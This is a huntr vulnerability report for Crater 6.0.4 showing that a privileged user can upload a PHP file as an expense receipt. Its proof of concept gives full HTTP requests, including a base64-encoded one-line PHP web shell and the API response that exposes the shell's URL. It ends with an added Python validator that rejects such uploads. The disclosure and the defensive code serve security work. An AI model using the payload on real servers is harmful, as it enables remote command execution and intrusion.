huntr report 4D7D4FC9-E0CF-42D3-B89C-6EA57A769045 by theworstcomrade, Feb 20, 2022 - 9:02 p.m.

Unrestricted Upload of File with Dangerous Type

2022-02-20 21:02:06
theworstcomrade
www.huntr.dev
20

EPSS: 0.0005 (Low), percentile 18.0%

Description

In the recent Crater version (commit bed05fc2, tag 6.0.4) a privileged user can upload a PHP file as an expense receipt.

Proof of Concept

POST /api/v1/expenses/59/upload/receipts HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------167024296112701364263127960184
Content-Length: 372
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...

-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="type"

edit
-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="attachment_receipt"

{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"2137webshell.php"}
-----------------------------167024296112701364263127960184--



Next, when you fetch this expense through the API, the response contains an attachment_receipt_url parameter with the URL of the uploaded webshell file.

GET /api/v1/expenses/59 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkR4UDNSU1kzai9Ya0ljSTg1cEpCWmc9PSIsInZhbHVlIjoiMVA1b241VHpQWlBQNklrT1RVM1RxcUZRSEU3MGkraHh1OTNQcnJzdWVGR25mblZRQWp6Y3hhYzJnamkyWDgzNEpING9hb3lzT1U4dWlKYlFrcm0zYWlKNWNOQlRhWHVnQnpuTm1TZVVSdHIweTNHMFJJN0F4Z3FwNlhYZEVaY1oiLCJtYWMiOiI3YTQyMDk1NGNmYTYxMGMyZWM0MzQzNDkwMWQ0NDc1NzdiNjdiNmRhNzgzNTA4ZjU5NDVhYTAyNWU1YzZiNDYzIiwidGFnIjoiIn0=
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...


HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Sun, 20 Feb 2022 20:47:20 GMT
Connection: close
X-Powered-By: PHP/8.0.15
Cache-Control: no-cache, private
Date: Sun, 20 Feb 2022 20:47:20 GMT
Content-Type: application/json
X-RateLimit-Limit: 180
X-RateLimit-Remaining: 178
Set-Cookie: ...

{
    "data":
    {
        "id": 59,
        "expense_date": "2022-01-22T00:00:00.000000Z",
        "amount": 100,
        "notes": "assss",
        "customer_id": 2,
        "attachment_receipt_url":
        {
            "url": "http:\/\/172.17.0.1:8888\/storage\/50\/2137webshell.php",
            "type": "other"
        }
...
    }
}
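
As an added illustration of the server-side check that is missing here (example code, not Crater's own; the extension allowlist, size limit and random storage name are assumptions), this Python validator parses an attachment_receipt field of the shape used in the PoC and rejects the payload above while accepting a genuine image:

```python
"""Validate a receipt upload field of the form {"data": <base64>, "type": ..., "name": ...}.
Added example, not Crater's code; allowlist and naming scheme are assumed policy."""
import base64
import json
import os
import secrets

# Allowed receipt types: extension -> acceptable leading magic bytes (assumed policy).
ALLOWED = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
MAX_BYTES = 5 * 1024 * 1024  # assumed upper bound for a receipt


class InvalidReceipt(ValueError):
    pass


def validate_receipt(raw_field: str) -> tuple[str, bytes]:
    """Return (server-chosen filename, file bytes) or raise InvalidReceipt.
    The client name is used only to read the last extension; content must
    match that extension's magic bytes, so a '.php' name or PHP content is refused."""
    try:
        payload = json.loads(raw_field)
        name = str(payload["name"])
        data = base64.b64decode(payload["data"], validate=True)
    except (ValueError, KeyError, TypeError) as exc:
        raise InvalidReceipt(f"malformed payload: {exc}") from exc
    if len(data) > MAX_BYTES:
        raise InvalidReceipt("file too large")
    ext = os.path.splitext(os.path.basename(name))[1].lower()  # last extension only
    if ext not in ALLOWED:
        raise InvalidReceipt(f"extension {ext!r} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise InvalidReceipt("content does not match declared extension")
    # Never store under the client-supplied name; pick a random one server-side.
    return secrets.token_hex(16) + ext, data


# Constructed samples: the PoC field from this report, the same PHP content with a
# double extension, and a benign PNG header.
POC_FIELD = '{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"2137webshell.php"}'
PHP_AS_PNG_FIELD = '{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"receipt.php.png"}'
PNG_FIELD = json.dumps({"data": base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\0" * 16).decode(),
                        "type": "edit", "name": "receipt.png"})


def is_accepted(field: str) -> bool:
    try:
        validate_receipt(field)
        return True
    except InvalidReceipt:
        return False
```

The double-extension sample is refused by the magic-byte check even though its last extension is on the allowlist.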

Impact

This vulnerability is of high severity and leads to code execution.
